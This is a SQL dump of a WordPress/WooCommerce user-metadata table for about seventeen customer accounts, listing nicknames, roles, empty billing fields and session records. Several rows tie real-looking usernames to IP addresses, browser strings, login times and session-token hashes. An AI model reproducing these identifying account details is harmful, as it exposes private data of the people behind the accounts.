INSERT INTO `wp_usermeta` VALUES (2822, 150, 'session_tokens', 'a:1:{s:64:"000403cbb4add4e3c397ffb2b22d630314f116f88f27790f32309c6f84665b1c";a:4:{s:10:"expiration";i:1479742871;s:2:"ip";s:12:"70.55.33.126";s:2:"ua";s:102:"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36";s:5:"login";i:1478533271;}}'); 
INSERT INTO `wp_usermeta` VALUES (2823, 151, 'nickname', 'simon.ricks'); 
INSERT INTO `wp_usermeta` VALUES (2824, 151, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2825, 151, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2826, 151, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2827, 151, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2828, 151, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2829, 151, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2830, 151, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2831, 151, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2832, 151, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2833, 151, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2834, 151, '_yoast_wpseo_profile_updated', '1478545951'); 
INSERT INTO `wp_usermeta` VALUES (2835, 151, 'session_tokens', 'a:1:{s:64:"bc0c5a61e6c94785592c2bc464cad729b1173ebe9d2a517a1019db2a06ad6460";a:4:{s:10:"expiration";i:1479755552;s:2:"ip";s:13:"173.198.4.194";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1478545952;}}'); 
INSERT INTO `wp_usermeta` VALUES (2836, 151, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2837, 152, 'nickname', 'linda.zipperer'); 
INSERT INTO `wp_usermeta` VALUES (2838, 152, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2839, 152, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2840, 152, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2841, 152, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2842, 152, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2843, 152, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2844, 152, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2845, 152, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2846, 152, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2847, 152, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2848, 152, '_yoast_wpseo_profile_updated', '1478626803'); 
INSERT INTO `wp_usermeta` VALUES (2849, 152, 'session_tokens', 'a:1:{s:64:"5032b200a8813d12117e8ff95eb24ef19f2a04a6a1c795e4680169f6ce5a5e76";a:4:{s:10:"expiration";i:1479836404;s:2:"ip";s:15:"104.129.196.124";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1478626804;}}'); 
INSERT INTO `wp_usermeta` VALUES (2850, 152, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2851, 153, 'nickname', 'michael.nerino'); 
INSERT INTO `wp_usermeta` VALUES (2852, 153, 'first_name', 'Jack'); 
INSERT INTO `wp_usermeta` VALUES (2853, 153, 'last_name', 'Joeb'); 
INSERT INTO `wp_usermeta` VALUES (2854, 153, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2855, 153, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2856, 153, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2857, 153, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2858, 153, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2859, 153, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2860, 153, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2861, 153, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2862, 153, '_yoast_wpseo_profile_updated', '1478631451'); 
INSERT INTO `wp_usermeta` VALUES (2864, 153, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2867, 153, 'session_tokens', 'a:1:{s:64:"2b75405df794e46c727b2fc603c1f9d48054a599d4433d0d1a4ec12ea1bbaa93";a:4:{s:10:"expiration";i:1478805577;s:2:"ip";s:15:"134.223.116.153";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1478632777;}}'); 
INSERT INTO `wp_usermeta` VALUES (2868, 153, 'last_update', '1478632950'); 
INSERT INTO `wp_usermeta` VALUES (2869, 154, 'nickname', 'dianne.snider'); 
INSERT INTO `wp_usermeta` VALUES (2870, 154, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2871, 154, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2872, 154, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2873, 154, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2874, 154, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2875, 154, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2876, 154, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2877, 154, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2878, 154, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2879, 154, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2880, 154, '_yoast_wpseo_profile_updated', '1478712094'); 
INSERT INTO `wp_usermeta` VALUES (2881, 154, 'session_tokens', 'a:1:{s:64:"a803837c66e72d899cd8b119fd92ff14faa06537416232091163f04dd3f7abba";a:4:{s:10:"expiration";i:1479921695;s:2:"ip";s:13:"149.32.192.39";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1478712095;}}'); 
INSERT INTO `wp_usermeta` VALUES (2882, 154, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2883, 155, 'nickname', 'gary.wadkins'); 
INSERT INTO `wp_usermeta` VALUES (2884, 155, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2885, 155, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2886, 155, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2887, 155, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2888, 155, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2889, 155, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2890, 155, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2891, 155, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2892, 155, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2893, 155, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2894, 155, '_yoast_wpseo_profile_updated', '1478776433'); 
INSERT INTO `wp_usermeta` VALUES (2896, 155, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2897, 156, 'nickname', 'jonandkana'); 
INSERT INTO `wp_usermeta` VALUES (2898, 156, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2899, 156, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2900, 156, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2901, 156, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2902, 156, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2903, 156, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2904, 156, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2905, 156, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2906, 156, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2907, 156, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2908, 156, '_yoast_wpseo_profile_updated', '1478790332'); 
INSERT INTO `wp_usermeta` VALUES (2909, 156, 'session_tokens', 'a:1:{s:64:"828bbc139f14e52bb7ce710c43c73d75ef51e05f72a0cc8d63bdff0de87f7bec";a:4:{s:10:"expiration";i:1479999933;s:2:"ip";s:12:"172.75.9.199";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36";s:5:"login";i:1478790333;}}'); 
INSERT INTO `wp_usermeta` VALUES (2910, 156, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2911, 157, 'nickname', 'cbs009'); 
INSERT INTO `wp_usermeta` VALUES (2912, 157, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2913, 157, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2914, 157, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2915, 157, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2916, 157, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2917, 157, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2918, 157, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2919, 157, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2920, 157, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2921, 157, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2922, 157, '_yoast_wpseo_profile_updated', '1478793842'); 
INSERT INTO `wp_usermeta` VALUES (2923, 157, 'session_tokens', 'a:1:{s:64:"68de20fd83da29deacdb658063ae7c1483face0e8e68b767a28cc73b174d8f4a";a:4:{s:10:"expiration";i:1480003443;s:2:"ip";s:14:"130.184.253.61";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1478793843;}}'); 
INSERT INTO `wp_usermeta` VALUES (2924, 157, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2925, 158, 'nickname', 'hancy.barnes'); 
INSERT INTO `wp_usermeta` VALUES (2926, 158, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2927, 158, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2928, 158, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2929, 158, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2930, 158, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2931, 158, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2932, 158, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2933, 158, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2934, 158, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2935, 158, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2936, 158, '_yoast_wpseo_profile_updated', '1478809909'); 
INSERT INTO `wp_usermeta` VALUES (2937, 158, 'session_tokens', 'a:1:{s:64:"28aaebf9a0228a093f2d3cc5a1720072fd26c5ea212e4df421103aa66f73446c";a:4:{s:10:"expiration";i:1487277606;s:2:"ip";s:13:"152.132.11.65";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1487104806;}}'); 
INSERT INTO `wp_usermeta` VALUES (2938, 158, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2939, 159, 'nickname', 'kristine.petrella'); 
INSERT INTO `wp_usermeta` VALUES (2940, 159, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2941, 159, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2942, 159, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2943, 159, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2944, 159, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2945, 159, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2946, 159, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2947, 159, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2948, 159, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2949, 159, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2950, 159, '_yoast_wpseo_profile_updated', '1478874595'); 
INSERT INTO `wp_usermeta` VALUES (2951, 159, 'session_tokens', 'a:1:{s:64:"65eed8f11b4761b68d2e82f1e6f31c0f5c51e4d35096fea6d24e13bf04fd2b10";a:4:{s:10:"expiration";i:1480031347;s:2:"ip";s:15:"104.129.196.110";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1478821747;}}'); 
INSERT INTO `wp_usermeta` VALUES (2952, 159, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (2953, 160, 'nickname', 'matthew.letts'); 
INSERT INTO `wp_usermeta` VALUES (2954, 160, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2955, 160, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2956, 160, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (2957, 160, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2958, 160, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (2959, 160, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (2960, 160, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (2961, 160, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (2962, 160, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (2963, 160, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (2964, 160, '_yoast_wpseo_profile_updated', '1478874521'); 
INSERT INTO `wp_usermeta` VALUES (2966, 160, 'wpseo_title', ''); 
INSERT INTO `wp_usermeta` VALUES (2967, 160, 'wpseo_metadesc', ''); 
INSERT INTO `wp_usermeta` VALUES (2968, 160, 'wpseo_metakey', ''); 
INSERT INTO `wp_usermeta` VALUES (2969, 160, 'wpseo_excludeauthorsitemap', ''); 
INSERT INTO `wp_usermeta` VALUES (2970, 160, 'wpseo_content_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (2971, 160, 'wpseo_keyword_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (2972, 160, 'billing_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2973, 160, 'billing_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2974, 160, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (2975, 160, 'billing_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (2976, 160, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (2977, 160, 'billing_city', ''); 
INSERT INTO `wp_usermeta` VALUES (2978, 160, 'billing_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (2979, 160, 'billing_country', ''); 
INSERT INTO `wp_usermeta` VALUES (2980, 160, 'billing_state', ''); 
INSERT INTO `wp_usermeta` VALUES (2981, 160, 'billing_phone', ''); 
INSERT INTO `wp_usermeta` VALUES (2982, 160, 'billing_email', ''); 
INSERT INTO `wp_usermeta` VALUES (2983, 160, 'shipping_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2984, 160, 'shipping_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (2985, 160, 'shipping_company', ''); 
INSERT INTO `wp_usermeta` VALUES (2986, 160, 'shipping_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (2987, 160, 'shipping_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (2988, 160, 'shipping_city', ''); 
INSERT INTO `wp_usermeta` VALUES (2989, 160, 'shipping_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (2990, 160, 'shipping_country', ''); 
INSERT INTO `wp_usermeta` VALUES (2991, 160, 'shipping_state', ''); 
INSERT INTO `wp_usermeta` VALUES (2992, 160, 'googleplus', ''); 
INSERT INTO `wp_usermeta` VALUES (2993, 160, 'twitter', ''); 
INSERT INTO `wp_usermeta` VALUES (2994, 160, 'facebook', ''); 
INSERT INTO `wp_usermeta` VALUES (2995, 160, 'last_update', '1478874523'); 
INSERT INTO `wp_usermeta` VALUES (2996, 159, 'wpseo_title', ''); 
INSERT INTO `wp_usermeta` VALUES (2997, 159, 'wpseo_metadesc', ''); 
INSERT INTO `wp_usermeta` VALUES (2998, 159, 'wpseo_metakey', ''); 
INSERT INTO `wp_usermeta` VALUES (2999, 159, 'wpseo_excludeauthorsitemap', ''); 
INSERT INTO `wp_usermeta` VALUES (3000, 159, 'wpseo_content_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (3001, 159, 'wpseo_keyword_analysis_disable', ''); 
INSERT INTO `wp_usermeta` VALUES (3002, 159, 'billing_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3003, 159, 'billing_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3004, 159, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (3005, 159, 'billing_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (3006, 159, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (3007, 159, 'billing_city', ''); 
INSERT INTO `wp_usermeta` VALUES (3008, 159, 'billing_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (3009, 159, 'billing_country', ''); 
INSERT INTO `wp_usermeta` VALUES (3010, 159, 'billing_state', ''); 
INSERT INTO `wp_usermeta` VALUES (3011, 159, 'billing_phone', ''); 
INSERT INTO `wp_usermeta` VALUES (3012, 159, 'billing_email', ''); 
INSERT INTO `wp_usermeta` VALUES (3013, 159, 'shipping_first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3014, 159, 'shipping_last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3015, 159, 'shipping_company', ''); 
INSERT INTO `wp_usermeta` VALUES (3016, 159, 'shipping_address_1', ''); 
INSERT INTO `wp_usermeta` VALUES (3017, 159, 'shipping_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (3018, 159, 'shipping_city', ''); 
INSERT INTO `wp_usermeta` VALUES (3019, 159, 'shipping_postcode', ''); 
INSERT INTO `wp_usermeta` VALUES (3020, 159, 'shipping_country', ''); 
INSERT INTO `wp_usermeta` VALUES (3021, 159, 'shipping_state', ''); 
INSERT INTO `wp_usermeta` VALUES (3022, 159, 'googleplus', ''); 
INSERT INTO `wp_usermeta` VALUES (3023, 159, 'twitter', ''); 
INSERT INTO `wp_usermeta` VALUES (3024, 159, 'facebook', ''); 
INSERT INTO `wp_usermeta` VALUES (3025, 159, 'last_update', '1478874596'); 
INSERT INTO `wp_usermeta` VALUES (3026, 161, 'nickname', 'tberk'); 
INSERT INTO `wp_usermeta` VALUES (3027, 161, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3028, 161, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3029, 161, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3030, 161, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3031, 161, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3032, 161, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3033, 161, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3034, 161, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3035, 161, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3036, 161, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3037, 161, '_yoast_wpseo_profile_updated', '1478884859'); 
INSERT INTO `wp_usermeta` VALUES (3038, 161, 'session_tokens', 'a:1:{s:64:"d28b760ff5573f4f4be972276e26c7e7c165160c61480769ce9cbe950543ce1b";a:4:{s:10:"expiration";i:1480094460;s:2:"ip";s:15:"206.123.241.209";s:2:"ua";s:116:"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/537.86.7";s:5:"login";i:1478884860;}}'); 
INSERT INTO `wp_usermeta` VALUES (3039, 162, 'nickname', 'rlwurst'); 
INSERT INTO `wp_usermeta` VALUES (3040, 162, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3041, 162, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3042, 162, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3043, 162, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3044, 162, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3045, 162, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3046, 162, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3047, 162, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3048, 162, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3049, 162, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3050, 162, '_yoast_wpseo_profile_updated', '1478892403'); 
INSERT INTO `wp_usermeta` VALUES (3051, 162, 'session_tokens', 'a:1:{s:64:"d2cbc7a4edcbeb9cf4de08756d2a94ee28d6e8428e2a8fa76c01e98b72538074";a:4:{s:10:"expiration";i:1480102004;s:2:"ip";s:13:"70.91.225.169";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0";s:5:"login";i:1478892404;}}'); 
INSERT INTO `wp_usermeta` VALUES (3052, 162, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3053, 163, 'nickname', 'pisit.khuon'); 
INSERT INTO `wp_usermeta` VALUES (3054, 163, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3055, 163, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3056, 163, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3057, 163, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3058, 163, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3059, 163, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3060, 163, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3061, 163, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3062, 163, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3063, 163, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3064, 163, '_yoast_wpseo_profile_updated', '1478900142'); 
INSERT INTO `wp_usermeta` VALUES (3065, 163, 'session_tokens', 'a:1:{s:64:"b9c02040b71fda94879614236d877f0f9a74e8b668e71f2398ed60b3ef92206f";a:4:{s:10:"expiration";i:1480109743;s:2:"ip";s:14:"173.251.75.178";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1478900143;}}'); 
INSERT INTO `wp_usermeta` VALUES (3066, 163, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3067, 164, 'nickname', 'jeff.schmidt'); 
INSERT INTO `wp_usermeta` VALUES (3068, 164, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3069, 164, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3070, 164, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3071, 164, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3072, 164, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3073, 164, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3074, 164, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3075, 164, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3076, 164, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3077, 164, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3078, 164, '_yoast_wpseo_profile_updated', '1478904246'); 
INSERT INTO `wp_usermeta` VALUES (3079, 164, 'session_tokens', 'a:1:{s:64:"183a173f3c1598ec3e6ffa5dc93f44dc1757755911422827ee508414f9031fbc";a:4:{s:10:"expiration";i:1480113847;s:2:"ip";s:14:"192.107.246.82";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1478904247;}}'); 
INSERT INTO `wp_usermeta` VALUES (3080, 164, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3081, 165, 'nickname', 'petermhamilton'); 
INSERT INTO `wp_usermeta` VALUES (3082, 165, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3083, 165, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3084, 165, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3085, 165, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3086, 165, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3087, 165, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3088, 165, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3089, 165, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3090, 165, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3091, 165, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (3092, 165, '_yoast_wpseo_profile_updated', '1479158977'); 
INSERT INTO `wp_usermeta` VALUES (3093, 165, 'session_tokens', 'a:1:{s:64:"6dee74eb7bcd38a69cbbfce41b715137126caa43da29cccd897048ea0d2b45f9";a:4:{s:10:"expiration";i:1480368578;s:2:"ip";s:14:"192.104.67.121";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1479158978;}}'); 
INSERT INTO `wp_usermeta` VALUES (3094, 165, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (3095, 166, 'nickname', 'stevenw'); 
INSERT INTO `wp_usermeta` VALUES (3096, 166, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3097, 166, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (3098, 166, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (3099, 166, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3100, 166, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (3101, 166, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (3102, 166, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (3103, 166, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (3104, 166, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (3105, 166, 'wp_user_level', '0'); 
